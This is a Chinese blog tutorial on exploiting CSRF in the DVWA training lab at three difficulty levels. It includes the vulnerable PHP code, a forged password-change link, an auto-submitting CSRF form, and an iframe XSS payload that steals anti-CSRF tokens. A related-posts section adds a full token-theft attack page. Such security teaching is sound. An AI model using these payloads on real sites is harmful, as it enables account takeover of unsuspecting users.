DVWA-CSRF漏洞【全难度】

原创 已于 2023-06-10 20:49:10 修改 · 305 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#csrf #安全

于 2023-06-10 20:47:43 首次发布

DVWA-CSRF漏洞【全难度】

CSRF漏洞全称是Cross-site Request Forgery,跨站请求伪造。

这个漏洞主要的思路是利用了本来就登录在目标网站A的用户,当这些用户点击了相应的伪造网站B后,这些网站中的陷阱就会使用户访问网站A(在用户不知道的情况下),这样就可以借助用户之手,做到列入修改密码之类的操作。

Low级别

在这里插入图片描述

我们可以看看源码:

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update the database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

我们可以看到,这份源码没有什么防御机制,没有Token值。同时我们可以看出,这个密码值是直接用GET请求进行提交的。
所以我们可以直接构造链接(因为我这边是直接使用的Docker进行DVWA的搭建,本地端口对其进行了映射,所以这里是8082,自己搭建的用自己的URL就好了):

http://localhost:8082/vulnerabilities/csrf/index.php?password_new=admin123&password_conf=admin123&Change=Change#

直接执行链接后,就会跳转到修改密码页面,并且显示密码修改成功。
在这里插入图片描述

利用漏洞

我们要利用这个漏洞,首先需要找一个受害者。
使用BurpSuite可以快速构造攻击页面:
在这里插入图片描述
在这里插入图片描述
这里我们获取并且构造我们想要的页面,当受害者访问了我们的页面并且点击了按钮,就会被修改密码

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost:8082/vulnerabilities/csrf/index.php">
      <input type="hidden" name="password&#95;new" value="hack123" />
      <input type="hidden" name="password&#95;conf" value="hack123" />
      <input type="hidden" name="Change" value="Change" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

注意,受害者必须要使用他登录过这个网站(我们以DVWA为例)的浏览器,因为受害者的登录信息是会被存储到这个浏览器中的,如果使用别的浏览器,只会跳转到dvwa的开始登录界面。

Medium级别

我们再看看源码

 <?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Checks to see where the request came from
    if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ])!=-1 ) {
        // Get input
        $pass_new  = $_GET[ 'password_new' ];
        $pass_conf = $_GET[ 'password_conf' ];

        // Do the passwords match?
        if( $pass_new == $pass_conf ) {
            // They do!
            $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
            $pass_new = md5( $pass_new );

            // Update the database
            $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
            $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

            // Feedback for the user
            echo "<pre>Password Changed.</pre>";
        }
        else {
            // Issue with passwords matching
            echo "<pre>Passwords did not match.</pre>";
        }
    }
    else {
        // Didn't come from a trusted source
        echo "<pre>That request didn't look correct.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

从第一行的if判断

if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ])!=-1 )

我们可以看出这个级别的难度是为了让我们关注$_SERVER[ 'HTTP_REFERER' ],也就是我们访问时候的http头部中的Referer字段问题。
直接修改头部就行(不过我这边直接不用修改也可以完成修改密码,我也不清楚为什么)
在这里插入图片描述
不懂Referer请求头的可以去网上搜搜,或者问问GPT。

High级别

看看源码

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update the database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

// Generate Anti-CSRF token
generateSessionToken();

?>

从这里

   checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

可以知道他开始检测Token值了。我们可以直接Token绕过。

使用BurpSuite进行Token绕过

BurpSuite中有一个插件,叫做CSRF Token Tracker
在这里插入图片描述
安装后进行使用

利用XSS漏洞配合

不过我研究了一个下午,我发现我的BurpSuite中这个插件总是没有反应,我也不知道为什么,可能是某些地方总是会有Bug吧,所以我使用了另一个方法,那就是和Xss联动。(如果有人用这个插件弄出来的可以给我讲讲是怎么办到的)

因为我们知道,当你每一次访问CSRF的修改密码的界面的时候,都会导致你的浏览器获得了一个新的user_token,所以如果此时,受害者没有继续更新加载这个页面,那么Token值就会作为一个变量存在浏览器中。所以我们使用XSS攻击就可以直接获取到它的值。

PayLoad如下:

<iframe src="../csrf" οnlοad=alert(frames[0].document.getElementsByName('user_token')[0].value)>

这个Payload首先跳转到了csrf页面,onload在页面加载时就开始执行,获取了frames[0],也就是我们的iframe中的自己的token

在这里插入图片描述

此时,如果不出意外的话,此时间段整个浏览器的token就只有我们获得的这一个。

然后我们利用这个Token进行和上文一样的方式,就可以修改掉密码了
在这里插入图片描述

DVWA-CSRF漏洞
sc_Pease的博客
01-29 520
参考:https://blog.csdn.net/qq_44720671/article/details/97393100 一、漏洞简介 1,CSRF:cross-site request forgery跨站请求伪造,一种常见Web攻击。 2,利用场景:攻击者伪造一个请求(通常是一个链接),然后欺骗目标用户点击,用户一旦点击,攻击就完成了。 3,与XSS比较:csrf是借助用户的权限去完成,而xss是盗取用户权限去进行破坏。 二、查看不同难度dvwa源代码 1,low难度 查看网页源代码
DVWA——CSRF漏洞
qq_62803993的博客
01-14 447
首先进入初级页面我们知道这是一个修改密码的,当我们输入密码进行修改后,提示修改成功后,我们会发现这也是一个get型提交。那我们就试试直接在地址栏中修改内容,看能否执行成功。(修改内容后,我们复制链接重新打开一个界面,然后输入网址进入页面,出现下图,要注意的是我们必须使用同一个浏览器,因为在访问页面时通常存在cookie认证,否则即使点击了恶意链接也没用。
DVWACSRF漏洞
weixin_56306210的博客
03-17 1578
DVWACSRF漏洞
【web安全DVWA CSRF漏洞分析与利用
KP_0x01的博客
07-13 994
安全级别防护措施攻击难度Low无防护★☆☆☆☆MediumReferer检查★★☆☆☆HighCSRF Token★★★☆☆Impossible多因素认证★★★★★。
DVWA系列之18 CSRF漏洞分析
weixin_34205076的博客
12-25 263
下面我们来查看一下low级别的CSRF源码:代码中在获取了$pass_new和$pass_conf这两个变量之后,利用mysql_real_escape_string()函数进行了过滤,这样虽然可以防止SQL注入,但却无法阻止CSRF***,之后这两个变量便被直接代入UPDATE语句中执行了数据库更新操作。下面再来分析一下medium级别的代码:可以看到这里在获取$pass_new和$pass_c...
DVWA-安装-漏洞测试-漏洞修复指南.docx
05-17
#### CSRF漏洞 1. **漏洞分析**: - 低级漏洞中,修改密码无需验证原密码,仅需新密码与确认密码一致即可。 - 中级漏洞引入了HTTP_REFERER检查,增加了攻击的复杂性。 - 高级漏洞中增加了对原密码的验证。 2. **...
DVWA-CSRF跨站请求伪造 -High级别
xmj818719的博客
02-27 1725
基础知识介绍csrf攻击流程 实验环境: CSRF模拟攻击环境(这里是内网环境,公网只需要对端口进行映射即可,其他操作同理) CentOS7 DVWA服务器(模拟转账系统) 192.168.0.9 kali 黑客(攻击者) 192.168.0.2 Win10 用户(受害者) 192.168.0.5 1使用条件: 1、使用关闭XSS的chrome浏览器 新建chrome浏览器快捷方式 “C:\Program Files (x86)\Google\Chrome\chrome-xss.e
DVWA-master安装包
02-28
DVWA中,每个漏洞都有不同的难度级别,从低到高,帮助用户逐步理解并掌握漏洞利用和防御策略。同时,通过修复这些漏洞,你可以学习如何编写更安全的代码,提高Web应用的安全性。 学习过程中,你还可以利用一些...
DVWA CSRF 漏洞实践报告
聚焦网络安全,以多元语言优势汲取知识,分享生动有趣的学习与技术心得。
10-13 2338
CSRF(跨站请求伪造)是一种攻击,使得攻击者能够以受害者的身份执行非预期的操作。在靶场DVWA中,我将尝试通过CSRF漏洞更改管理员密码。
DVWACSRF漏洞(详细)
热门推荐
qq_44720671的博客
07-26 2万+
CSRF简介 csrf称为:Cross-site request forgery,是一种常见的web攻击。在场景中,攻击者会伪造一个请求(通常是一个链接),然后欺骗目标用户点击,用户一旦点击,攻击也就完成了。 与xss的区别:csrf是借助用户的权限完成攻击,攻击者并没有拿到权限;而xss是直接盗取用户权限去进行破坏。 更改难度: 点击dvwa security,选择难度,然后点击submit...
使用dvwa环境进行csrf漏洞练习
DXfighting_的博客
04-14 760
登录dvwa环境,并将等级设为low, 打开csrf看到一个修改密码界面 查看源代码,发现这里只对两次输入的密码是不是相同进行判断,未做任何防护 使用hackerbar发现输入的参数在url中,我们可以利用这个特点 写一个csrf.Php文件, <img src="http://127.0.0.1/DVWA-1.9/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change..
DVWA-—【CSRF漏洞利用
qq_34914659的博客
05-20 1283
1.漏洞介绍 CSRF跨站点请求伪造(Cross—Site Request Forgery),攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。https://www.freebuf.com/articles/web/253838.htmlCSRF和XSS的最大的区别在于,CSRF并没有盗取cookie而是直接利用。 下图...
csrf漏洞(三)
2302_80280669的博客
08-21 509
若长时间未登录DVWA,无法正常登录。此时可直接访问。
DVWA靶场笔记之csrf漏洞原理
Alonegrief的博客
11-20 1522
DVWA漏洞源码分析——(三)csrf Csrf原理: Csrf中文称为跨站请求伪造,利用受害者未失效的身份认证信息(cookie,会话等)诱骗其点击恶意链接或者去访问攻击者构造的含有攻击代码的页面,在受害者不知情的情况下,以受害者的身份向服务器发送请求,从而达到一些非法操作(转账,改密)。 Csrf和xss的攻击方式有点相似,但是不同的是: (1) csrf需要登录后才能操作,xss不需要 (2) csrf是请求页面api来时先非法操作,xss是先当前页面植入js脚本来修改页面内容 例子: 这里我们用dv
CSRF漏洞(原理、DVWA实验、修复建议)
coderge's CSDN Blog.
09-20 3852
目录 1 介绍CSRF漏洞 2 CSRF漏洞的原理 3 DVWA CSRF实验过程 3.1 low级别 3.2 medium级别 相关函数说明 3.3 high级别 3.4 impossible级别 4 CSRF漏洞修复建议 1 介绍CSRF漏洞 CSRF (Cross -site request forgery,跨站请求伪造)也被称为One Click Attack或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS)
DvwaCsrf攻击笔记
JBlock的博客
10-22 2273
介绍今天笔者便用dvwa漏洞测试环境来探讨一下跨站请求攻击。 Csrf称为Cross-Site Request Forgery中文解释为跨站请求伪造攻击。Csrf通常与XSS结合起来进行利用,一般存在XSS漏洞的网站,很大可能也存在Csrf漏洞。二者最简单的区别就是一个是获得用户信任,一个是获得服务端的信任。生活场景 比如说有一天,你闲来无事在寝室上网,然后打开网页,查看一下自己的银行余e,
【渗透测试】【DVWACSRF
preserphy的博客
08-07 1710
CSRF称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。...
dvwa靶场csrf的high难度已经有了获取user_token的脚本内容,如何使用
最新发布
08-05
<think>我们正在处理DVWA(Damn Vulnerable Web Application)中的CSRF(跨站请求伪造)漏洞的高级别(High)难度。在这个级别中,服务器引入了Anti-CSRF token机制,即每次用户访问修改密码页面时,服务器会生成一个随机的token(user_token),并嵌入在页面中。当用户提交修改密码请求时,必须同时提交这个token,服务器会验证token的有效性。因此,直接构造一个恶意链接是无法成功的,因为token是随机且一次性的。 根据引用[2]和[3],攻击者需要结合XSS(跨站脚本攻击)漏洞来获取页面中的user_token,然后构造一个包含该token的CSRF攻击。具体来说,攻击者可以制作一个恶意页面,该页面通过iframe嵌入目标页面(修改密码页面),然后利用JavaScript从iframe中提取user_token,并自动填充到恶意页面中的表单中,最后自动提交表单。 引用[3]提供了一个恶意页面的示例代码。我们分析一下这段代码: 1. 首先,定义了一个JavaScript函数`attack()`,该函数的功能是: - 从iframe(id为"hack")中获取嵌入的页面(即DVWA的修改密码页面)中的user_token的值。 - 将这个值赋给当前页面中名为'user_token'的隐藏输入框。 - 提交表单(id为"transfer")。 2. 然后,通过一个iframe标签嵌入DVWA的修改密码页面(注意:src属性指向目标页面),并设置该iframe为不可见(style="display:none;")。 3. 在body标签中设置onload事件,当页面加载完成时调用attack()函数。 4. 构造一个表单(id为"transfer"),其action指向修改密码的URL。表单中包含以下隐藏字段: - password_new: 要设置的新密码(例如"password") - password_conf: 确认密码(同上) - user_token: 从目标页面中获取的token(初始为空,由attack函数填充) - Change: 固定为"Change" 因此,当用户访问这个恶意页面时,会触发以下过程: - 加载页面,包括iframe(虽然不可见,但会加载目标页面)。 - 页面加载完成后,触发onload事件,调用attack()函数。 - attack()函数从iframe中的页面获取user_token,并填充到表单的user_token字段中。 - 自动提交表单,完成密码修改。 需要注意的是,由于同源策略(Same-Origin Policy),如果目标页面(DVWA)和恶意页面不在同一个域,那么JavaScript将无法读取iframe中的内容。因此,这个攻击通常要求恶意页面与目标站点同源(即部署在同一域名下),或者目标站点存在允许跨域访问的漏洞。在DVWA环境中,我们通常将恶意页面部署在同一台主机上(或者通过本地文件系统打开)来绕过同源策略的限制。 操作步骤: 1. 将引用[3]中的代码保存为一个HTML文件(例如attack.html)。 2. 修改代码中的URL,确保指向你的DVWA实例中的CSRF漏洞页面(例如:src="http://192.168.153.130/dvwa/vulnerabilities/csrf")。 3. 同样,修改表单的action属性为相同的URL。 4. 将恶意页面放置在攻击者的服务器上,或者直接通过文件系统打开(注意:现代浏览器由于安全原因,可能不允许本地文件执行跨域请求,因此建议使用Web服务器)。 5. 诱使受害者(已登录DVWA的用户)访问这个恶意页面。 当受害者访问恶意页面时,其密码将被修改为攻击者设定的密码(例如"password")。 注意:在实际攻击中,攻击者可能会将恶意页面伪装成正常页面,以诱骗用户点击。 引用[2]和[3]提供了关键信息,即通过XSS获取token(但这里并没有使用XSS,而是通过iframe嵌入页面并利用JavaScript读取token,这需要同源或目标页面没有设置X-Frame-Options头,且同源策略允许)。在DVWA中,CSRF页面通常没有设置X-Frame-Options,因此可以嵌入到iframe中。 但是,如果目标站点设置了X-Frame-Options为DENY或SAMEORIGIN,那么将无法嵌入到不同源的iframe中。在DVWA中,默认情况下没有设置这个头,所以可以嵌入。 因此,在DVWA High级别的CSRF攻击中,使用上述方法即可。 下面是根据引用[3]修改后的一个示例代码(注意替换URL):</think>在DVWA CSRF High难度中,使用获取`user_token`的脚本需要结合XSS漏洞绕过Anti-CSRF机制。以下是关键步骤和操作原理: ### 操作原理 1. **Anti-CSRF机制**:High级别要求每次请求携带动态生成的`user_token`,该token存在于修改密码页面的HTML表单中[^1]。 2. **攻击思路**:通过恶意页面嵌入目标页面(iframe),利用JavaScript窃取目标页面的`user_token`,自动填充并提交伪造请求[^3]。 ### 操作步骤 1. **构造恶意页面**: ```html <script> function attack() { // 从iframe中的目标页面窃取user_token let token = document.getElementById("hack").contentWindow.document .getElementsByName('user_token')[0].value; // 填充到恶意表单 document.getElementsByName('user_token')[0].value = token; // 自动提交表单 document.getElementById("transfer").submit(); } </script> <iframe src="http://DVWA-IP/dvwa/vulnerabilities/csrf" id="hack" style="display:none"> <!-- 隐藏iframe --> </iframe> <body onload="attack()"> <!-- 页面加载时触发攻击 --> <form id="transfer" method="GET" action="http://DVWA-IP/dvwa/vulnerabilities/csrf"> <input type="hidden" name="password_new" value="hacked"> <input type="hidden" name="password_conf" value="hacked"> <input type="hidden" name="user_token" value=""> <!-- 由JS填充 --> <input type="hidden" name="Change" value="Change"> </form> </body> ``` 2. **关键参数说明**: - `password_new/password_conf`:设置的新密码(示例中为`hacked`) - `action`:指向DVWACSRF漏洞URL - `iframe.src`:加载真实修改密码页面以窃取token 3. **执行流程**: 1. 用户访问恶意页面 2. 隐藏iframe加载DVWA修改密码页 3. JavaScript提取iframe中的`user_token` 4. 自动填充并提交表单,携带合法token 5. 服务器验证token通过,密码被修改[^2][^3] ### 注意事项 1. **同源策略限制**:恶意页面需与DVWA同域(或启用CORS),否则无法读取iframe内容 2. **用户状态**:受害者必须已登录DVWA且会话有效 3. **诱导方式**:通过社工手段诱使用户点击恶意链接 > 此攻击成功的关键在于**动态获取最新token**,直接使用固定token会因失效而失败[^2]。实际测试时需替换`DVWA-IP`为靶机真实IP。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值